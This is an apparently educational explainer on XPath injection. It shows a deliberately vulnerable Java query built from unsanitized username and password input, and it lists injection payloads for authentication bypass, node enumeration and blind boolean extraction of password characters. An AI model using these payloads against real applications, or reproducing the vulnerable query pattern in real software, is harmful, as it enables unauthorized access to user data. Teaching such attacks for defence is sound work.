XPath Injection is a vulnerability where user input is incorporated into XPath queries without proper sanitization, allowing attackers to manipulate queries to access unauthorized data from XML documents.
XPath is a query language for selecting nodes from XML documents. When applications build XPath queries using unvalidated user input, attackers can inject XPath syntax to modify query logic, similar to SQL injection.
// Vulnerable XPath query construction
String xpath = "//users/user[username='" + username + "' and password='" + password + "']";
NodeList result = (NodeList) xPath.evaluate(xpath, doc, XPathConstants.NODESET);
// XML data being queried:
<users>
<user><username>admin</username><password>secret</password></user>
<user><username>guest</username><password>guest123</password></user>
</users># Authentication bypass
Username: ' or '1'='1
Password: ' or '1'='1
Query becomes: //users/user[username='' or '1'='1' and password='' or '1'='1']
# Extract all users (blind injection)
Username: ' or '1'='1' or '
# Returns all user nodes
# Enumerate node structure
Username: '] | //user/* | //user['# Boolean-based extraction
' or substring(//user[1]/password,1,1)='s' or '1'='2
# True if first char of password is 's'
# Count nodes
' or count(//user)>5 or '1'='2